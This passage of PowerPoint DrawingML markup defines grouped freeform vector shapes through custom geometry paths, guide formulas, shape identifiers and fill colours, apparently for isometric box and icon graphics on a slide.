                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="13"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="34"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="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881" name="Group 77">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BF069B9-28B0-4202-9683-6E485CC7FC6D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772" y="1916"/>
                  <a:ext cx="191" cy="108"/>
                  <a:chOff x="347" y="3532"/>
                  <a:chExt cx="907" cy="516"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1893" name="Freeform 78">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{754DFC01-DC5B-49DF-9391-F74AFAC2EB2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800" y="3573"/>
                    <a:ext cx="303" cy="394"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 303"/>
                      <a:gd name="T1" fmla="*/ 0 h 394"/>
                      <a:gd name="T2" fmla="*/ 0 w 303"/>
                      <a:gd name="T3" fmla="*/ 312 h 394"/>
                      <a:gd name="T4" fmla="*/ 303 w 303"/>
                      <a:gd name="T5" fmla="*/ 394 h 394"/>
                      <a:gd name="T6" fmla="*/ 303 w 303"/>
                      <a:gd name="T7" fmla="*/ 82 h 394"/>
                      <a:gd name="T8" fmla="*/ 0 w 303"/>
                      <a:gd name="T9" fmla="*/ 0 h 39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3" h="394">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="312"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="303" y="394"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="303" y="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94" name="Freeform 79">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B41E75A-1117-4D02-B0E2-657822DBA86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800" y="3655"/>
                    <a:ext cx="303" cy="393"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 303"/>
                      <a:gd name="T1" fmla="*/ 393 h 393"/>
                      <a:gd name="T2" fmla="*/ 0 w 303"/>
                      <a:gd name="T3" fmla="*/ 81 h 393"/>
                      <a:gd name="T4" fmla="*/ 303 w 303"/>
                      <a:gd name="T5" fmla="*/ 0 h 393"/>
                      <a:gd name="T6" fmla="*/ 303 w 303"/>
                      <a:gd name="T7" fmla="*/ 312 h 393"/>
                      <a:gd name="T8" fmla="*/ 0 w 303"/>
                      <a:gd name="T9" fmla="*/ 393 h 3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3" h="393">
                        <a:moveTo>
                          <a:pt x="0" y="393"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="81"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="303" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="303" y="312"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="393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95" name="Freeform 80">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C8A8F0D-F165-4451-BF53-9763AC63339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501" y="3573"/>
                    <a:ext cx="299" cy="394"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 299"/>
                      <a:gd name="T1" fmla="*/ 394 h 394"/>
                      <a:gd name="T2" fmla="*/ 0 w 299"/>
                      <a:gd name="T3" fmla="*/ 82 h 394"/>
                      <a:gd name="T4" fmla="*/ 299 w 299"/>
                      <a:gd name="T5" fmla="*/ 0 h 394"/>
                      <a:gd name="T6" fmla="*/ 299 w 299"/>
                      <a:gd name="T7" fmla="*/ 312 h 394"/>
                      <a:gd name="T8" fmla="*/ 0 w 299"/>
                      <a:gd name="T9" fmla="*/ 394 h 39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99" h="394">
                        <a:moveTo>
                          <a:pt x="0" y="394"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="82"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="299" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="299" y="312"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="394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96" name="Freeform 81">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA14B1C9-0D9C-4AE6-BC79-7767ACBE7CE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501" y="3655"/>
                    <a:ext cx="299" cy="393"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 299"/>
                      <a:gd name="T1" fmla="*/ 0 h 393"/>
                      <a:gd name="T2" fmla="*/ 0 w 299"/>
                      <a:gd name="T3" fmla="*/ 312 h 393"/>
                      <a:gd name="T4" fmla="*/ 299 w 299"/>
                      <a:gd name="T5" fmla="*/ 393 h 393"/>
                      <a:gd name="T6" fmla="*/ 299 w 299"/>
                      <a:gd name="T7" fmla="*/ 81 h 393"/>
                      <a:gd name="T8" fmla="*/ 0 w 299"/>
                      <a:gd name="T9" fmla="*/ 0 h 3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99" h="393">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="312"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="299" y="393"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="299" y="8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97" name="Freeform 82">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EDE3DC8-B675-4532-9D2B-489F284A88B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347" y="3655"/>
                    <a:ext cx="453" cy="121"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 453"/>
                      <a:gd name="T1" fmla="*/ 41 h 121"/>
                      <a:gd name="T2" fmla="*/ 154 w 453"/>
                      <a:gd name="T3" fmla="*/ 0 h 121"/>
                      <a:gd name="T4" fmla="*/ 453 w 453"/>
                      <a:gd name="T5" fmla="*/ 81 h 121"/>
                      <a:gd name="T6" fmla="*/ 302 w 453"/>
                      <a:gd name="T7" fmla="*/ 121 h 121"/>
                      <a:gd name="T8" fmla="*/ 0 w 453"/>
                      <a:gd name="T9" fmla="*/ 41 h 1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3" h="121">
                        <a:moveTo>
                          <a:pt x="0" y="41"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="154" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="81"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="302" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="41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98" name="Freeform 83">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E33D7B3-A060-4DCB-B862-D64871DA59C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800" y="3532"/>
                    <a:ext cx="454" cy="123"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 454"/>
                      <a:gd name="T1" fmla="*/ 41 h 123"/>
                      <a:gd name="T2" fmla="*/ 154 w 454"/>
                      <a:gd name="T3" fmla="*/ 0 h 123"/>
                      <a:gd name="T4" fmla="*/ 454 w 454"/>
                      <a:gd name="T5" fmla="*/ 81 h 123"/>
                      <a:gd name="T6" fmla="*/ 303 w 454"/>
                      <a:gd name="T7" fmla="*/ 123 h 123"/>
                      <a:gd name="T8" fmla="*/ 0 w 454"/>
                      <a:gd name="T9" fmla="*/ 41 h 1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4" h="123">
                        <a:moveTo>
                          <a:pt x="0" y="41"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="154" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="454" y="81"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="303" y="123"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="41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99" name="Freeform 84">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13C60BC6-B505-4D39-B9AB-058B17E5CDC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354" y="3535"/>
                    <a:ext cx="446" cy="120"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 446"/>
                      <a:gd name="T1" fmla="*/ 80 h 120"/>
                      <a:gd name="T2" fmla="*/ 302 w 446"/>
                      <a:gd name="T3" fmla="*/ 0 h 120"/>
                      <a:gd name="T4" fmla="*/ 446 w 446"/>
                      <a:gd name="T5" fmla="*/ 38 h 120"/>
                      <a:gd name="T6" fmla="*/ 147 w 446"/>
                      <a:gd name="T7" fmla="*/ 120 h 120"/>
                      <a:gd name="T8" fmla="*/ 0 w 446"/>
                      <a:gd name="T9" fmla="*/ 80 h 1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46" h="120">
                        <a:moveTo>
                          <a:pt x="0" y="80"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="302" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="446" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="147" y="12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00" name="Freeform 85">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AC17494-7F78-4F5A-9BA0-84D0A395C7A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800" y="3655"/>
                    <a:ext cx="449" cy="119"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 449"/>
                      <a:gd name="T1" fmla="*/ 81 h 119"/>
                      <a:gd name="T2" fmla="*/ 303 w 449"/>
                      <a:gd name="T3" fmla="*/ 0 h 119"/>
                      <a:gd name="T4" fmla="*/ 449 w 449"/>
                      <a:gd name="T5" fmla="*/ 38 h 119"/>
                      <a:gd name="T6" fmla="*/ 147 w 449"/>
                      <a:gd name="T7" fmla="*/ 119 h 119"/>
                      <a:gd name="T8" fmla="*/ 0 w 449"/>
                      <a:gd name="T9" fmla="*/ 81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49" h="119">
                        <a:moveTo>
                          <a:pt x="0" y="81"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="303" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="449" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="147" y="119"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="81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882" name="Group 86">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32E7A301-C792-4C93-B203-18ECCAB6A8A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840" y="1889"/>
                  <a:ext cx="55" cy="43"/>
                  <a:chOff x="1315" y="1508"/>
                  <a:chExt cx="596" cy="469"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1890" name="Freeform 87">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0320C7A7-23A9-4516-A837-57E0A8BF8E8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rgbClr val="2A79D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91" name="Freeform 88">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98FF9847-F340-42DE-AEF1-CD72FE343DC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rgbClr val="2A79D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92" name="Freeform 89">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB8C1D2-7262-46D5-A614-FCEC5A9E1FE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1315" y="1589"/>
                    <a:ext cx="297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9D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883" name="Freeform 90">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F773B4B5-CD4D-4E00-9820-5498A550794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902" y="2014"/>
                  <a:ext cx="135" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 668 w 668"/>
                    <a:gd name="T1" fmla="*/ 76 h 177"/>
                    <a:gd name="T2" fmla="*/ 377 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 177"/>
                    <a:gd name="T4" fmla="*/ 0 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 177"/>
                    <a:gd name="T6" fmla="*/ 288 w 668"/>
                    <a:gd name="T7" fmla="*/ 177 h 177"/>
                    <a:gd name="T8" fmla="*/ 668 w 668"/>
                    <a:gd name="T9" fmla="*/ 76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8" h="177">
                      <a:moveTo>
                        <a:pt x="668" y="76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77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="668" y="7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1884" name="Group 91">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F2602E1-7512-43A8-8A0D-573AFB3F9EB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661" y="1900"/>
                  <a:ext cx="169" cy="261"/>
                  <a:chOff x="2363" y="1132"/>
                  <a:chExt cx="343" cy="529"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1885" name="Freeform 92">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCB9D87-DD45-4C0A-A5D4-6BF9B771C2F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474" y="1449"/>
                    <a:ext cx="145" cy="189"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 108 w 108"/>
                      <a:gd name="T1" fmla="*/ 36 h 140"/>
                      <a:gd name="T2" fmla="*/ 108 w 108"/>
                      <a:gd name="T3" fmla="*/ 35 h 140"/>
                      <a:gd name="T4" fmla="*/ 108 w 108"/>
                      <a:gd name="T5" fmla="*/ 28 h 140"/>
                      <a:gd name="T6" fmla="*/ 108 w 108"/>
                      <a:gd name="T7" fmla="*/ 23 h 140"/>
                      <a:gd name="T8" fmla="*/ 108 w 108"/>
                      <a:gd name="T9" fmla="*/ 22 h 140"/>
                      <a:gd name="T10" fmla="*/ 108 w 108"/>
                      <a:gd name="T11" fmla="*/ 17 h 140"/>
                      <a:gd name="T12" fmla="*/ 108 w 108"/>
                      <a:gd name="T13" fmla="*/ 16 h 140"/>
                      <a:gd name="T14" fmla="*/ 108 w 108"/>
                      <a:gd name="T15" fmla="*/ 16 h 140"/>
                      <a:gd name="T16" fmla="*/ 89 w 108"/>
                      <a:gd name="T17" fmla="*/ 7 h 140"/>
                      <a:gd name="T18" fmla="*/ 64 w 108"/>
                      <a:gd name="T19" fmla="*/ 2 h 140"/>
                      <a:gd name="T20" fmla="*/ 57 w 108"/>
                      <a:gd name="T21" fmla="*/ 4 h 140"/>
                      <a:gd name="T22" fmla="*/ 49 w 108"/>
                      <a:gd name="T23" fmla="*/ 6 h 140"/>
                      <a:gd name="T24" fmla="*/ 49 w 108"/>
                      <a:gd name="T25" fmla="*/ 6 h 140"/>
                      <a:gd name="T26" fmla="*/ 0 w 108"/>
                      <a:gd name="T27" fmla="*/ 18 h 140"/>
                      <a:gd name="T28" fmla="*/ 29 w 108"/>
                      <a:gd name="T29" fmla="*/ 47 h 140"/>
                      <a:gd name="T30" fmla="*/ 62 w 108"/>
                      <a:gd name="T31" fmla="*/ 40 h 140"/>
                      <a:gd name="T32" fmla="*/ 62 w 108"/>
                      <a:gd name="T33" fmla="*/ 118 h 140"/>
                      <a:gd name="T34" fmla="*/ 101 w 108"/>
                      <a:gd name="T35" fmla="*/ 129 h 140"/>
                      <a:gd name="T36" fmla="*/ 108 w 108"/>
                      <a:gd name="T37" fmla="*/ 117 h 140"/>
                      <a:gd name="T38" fmla="*/ 108 w 108"/>
                      <a:gd name="T39" fmla="*/ 36 h 1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08" h="140">
                        <a:moveTo>
                          <a:pt x="108" y="36"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="33"/>
                          <a:pt x="108" y="30"/>
                          <a:pt x="108" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="28"/>
                          <a:pt x="108" y="26"/>
                          <a:pt x="108" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="23"/>
                          <a:pt x="108" y="22"/>
                          <a:pt x="108" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="21"/>
                          <a:pt x="108" y="19"/>
                          <a:pt x="108" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="4"/>
                          <a:pt x="95" y="8"/>
                          <a:pt x="89" y="7"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="6"/>
                          <a:pt x="73" y="0"/>
                          <a:pt x="64" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="3"/>
                          <a:pt x="57" y="4"/>
                          <a:pt x="57" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="67"/>
                          <a:pt x="62" y="109"/>
                          <a:pt x="62" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="138"/>
                          <a:pt x="89" y="140"/>
                          <a:pt x="101" y="129"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="126"/>
                          <a:pt x="108" y="122"/>
                          <a:pt x="108" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="101"/>
                          <a:pt x="107" y="69"/>
                          <a:pt x="108" y="3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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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86" name="Freeform 93">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FEAD07B-3A56-4817-9993-BBB5AC493DD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418" y="1435"/>
                    <a:ext cx="267" cy="226"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 196 w 197"/>
                      <a:gd name="T1" fmla="*/ 44 h 167"/>
                      <a:gd name="T2" fmla="*/ 196 w 197"/>
                      <a:gd name="T3" fmla="*/ 37 h 167"/>
                      <a:gd name="T4" fmla="*/ 177 w 197"/>
                      <a:gd name="T5" fmla="*/ 18 h 167"/>
                      <a:gd name="T6" fmla="*/ 137 w 197"/>
                      <a:gd name="T7" fmla="*/ 25 h 167"/>
                      <a:gd name="T8" fmla="*/ 99 w 197"/>
                      <a:gd name="T9" fmla="*/ 35 h 167"/>
                      <a:gd name="T10" fmla="*/ 99 w 197"/>
                      <a:gd name="T11" fmla="*/ 52 h 167"/>
                      <a:gd name="T12" fmla="*/ 99 w 197"/>
                      <a:gd name="T13" fmla="*/ 35 h 167"/>
                      <a:gd name="T14" fmla="*/ 99 w 197"/>
                      <a:gd name="T15" fmla="*/ 35 h 167"/>
                      <a:gd name="T16" fmla="*/ 99 w 197"/>
                      <a:gd name="T17" fmla="*/ 2 h 167"/>
                      <a:gd name="T18" fmla="*/ 89 w 197"/>
                      <a:gd name="T19" fmla="*/ 14 h 167"/>
                      <a:gd name="T20" fmla="*/ 2 w 197"/>
                      <a:gd name="T21" fmla="*/ 8 h 167"/>
                      <a:gd name="T22" fmla="*/ 2 w 197"/>
                      <a:gd name="T23" fmla="*/ 10 h 167"/>
                      <a:gd name="T24" fmla="*/ 2 w 197"/>
                      <a:gd name="T25" fmla="*/ 31 h 167"/>
                      <a:gd name="T26" fmla="*/ 12 w 197"/>
                      <a:gd name="T27" fmla="*/ 67 h 167"/>
                      <a:gd name="T28" fmla="*/ 70 w 197"/>
                      <a:gd name="T29" fmla="*/ 83 h 167"/>
                      <a:gd name="T30" fmla="*/ 83 w 197"/>
                      <a:gd name="T31" fmla="*/ 82 h 167"/>
                      <a:gd name="T32" fmla="*/ 149 w 197"/>
                      <a:gd name="T33" fmla="*/ 65 h 167"/>
                      <a:gd name="T34" fmla="*/ 150 w 197"/>
                      <a:gd name="T35" fmla="*/ 137 h 167"/>
                      <a:gd name="T36" fmla="*/ 150 w 197"/>
                      <a:gd name="T37" fmla="*/ 141 h 167"/>
                      <a:gd name="T38" fmla="*/ 197 w 197"/>
                      <a:gd name="T39" fmla="*/ 140 h 167"/>
                      <a:gd name="T40" fmla="*/ 196 w 197"/>
                      <a:gd name="T41" fmla="*/ 44 h 1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97" h="167">
                        <a:moveTo>
                          <a:pt x="196" y="44"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="44"/>
                          <a:pt x="196" y="40"/>
                          <a:pt x="196" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="23"/>
                          <a:pt x="183" y="19"/>
                          <a:pt x="177" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="168" y="17"/>
                          <a:pt x="137" y="25"/>
                          <a:pt x="137" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="20"/>
                          <a:pt x="99" y="4"/>
                          <a:pt x="99" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="98" y="8"/>
                          <a:pt x="95" y="13"/>
                          <a:pt x="89" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="16"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="2" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="55"/>
                          <a:pt x="0" y="64"/>
                          <a:pt x="12" y="67"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="69"/>
                          <a:pt x="66" y="82"/>
                          <a:pt x="70" y="83"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="83"/>
                          <a:pt x="78" y="84"/>
                          <a:pt x="83" y="82"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="97" y="78"/>
                          <a:pt x="127" y="71"/>
                          <a:pt x="149" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="138"/>
                          <a:pt x="150" y="140"/>
                          <a:pt x="150" y="141"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="167"/>
                          <a:pt x="196" y="163"/>
                          <a:pt x="197" y="140"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="125"/>
                          <a:pt x="196" y="60"/>
                          <a:pt x="196" y="44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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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87" name="Freeform 94">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{009228FB-C4D2-4C2A-A626-202BD6F4C34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363" y="1229"/>
                    <a:ext cx="343" cy="269"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 209 w 254"/>
                      <a:gd name="T1" fmla="*/ 119 h 200"/>
                      <a:gd name="T2" fmla="*/ 184 w 254"/>
                      <a:gd name="T3" fmla="*/ 127 h 200"/>
                      <a:gd name="T4" fmla="*/ 173 w 254"/>
                      <a:gd name="T5" fmla="*/ 55 h 200"/>
                      <a:gd name="T6" fmla="*/ 144 w 254"/>
                      <a:gd name="T7" fmla="*/ 27 h 200"/>
                      <a:gd name="T8" fmla="*/ 96 w 254"/>
                      <a:gd name="T9" fmla="*/ 14 h 200"/>
                      <a:gd name="T10" fmla="*/ 51 w 254"/>
                      <a:gd name="T11" fmla="*/ 2 h 200"/>
                      <a:gd name="T12" fmla="*/ 18 w 254"/>
                      <a:gd name="T13" fmla="*/ 13 h 200"/>
                      <a:gd name="T14" fmla="*/ 3 w 254"/>
                      <a:gd name="T15" fmla="*/ 96 h 200"/>
                      <a:gd name="T16" fmla="*/ 3 w 254"/>
                      <a:gd name="T17" fmla="*/ 96 h 200"/>
                      <a:gd name="T18" fmla="*/ 2 w 254"/>
                      <a:gd name="T19" fmla="*/ 99 h 200"/>
                      <a:gd name="T20" fmla="*/ 2 w 254"/>
                      <a:gd name="T21" fmla="*/ 99 h 200"/>
                      <a:gd name="T22" fmla="*/ 9 w 254"/>
                      <a:gd name="T23" fmla="*/ 118 h 200"/>
                      <a:gd name="T24" fmla="*/ 26 w 254"/>
                      <a:gd name="T25" fmla="*/ 119 h 200"/>
                      <a:gd name="T26" fmla="*/ 33 w 254"/>
                      <a:gd name="T27" fmla="*/ 117 h 200"/>
                      <a:gd name="T28" fmla="*/ 33 w 254"/>
                      <a:gd name="T29" fmla="*/ 117 h 200"/>
                      <a:gd name="T30" fmla="*/ 36 w 254"/>
                      <a:gd name="T31" fmla="*/ 116 h 200"/>
                      <a:gd name="T32" fmla="*/ 43 w 254"/>
                      <a:gd name="T33" fmla="*/ 114 h 200"/>
                      <a:gd name="T34" fmla="*/ 44 w 254"/>
                      <a:gd name="T35" fmla="*/ 76 h 200"/>
                      <a:gd name="T36" fmla="*/ 41 w 254"/>
                      <a:gd name="T37" fmla="*/ 77 h 200"/>
                      <a:gd name="T38" fmla="*/ 44 w 254"/>
                      <a:gd name="T39" fmla="*/ 53 h 200"/>
                      <a:gd name="T40" fmla="*/ 43 w 254"/>
                      <a:gd name="T41" fmla="*/ 171 h 200"/>
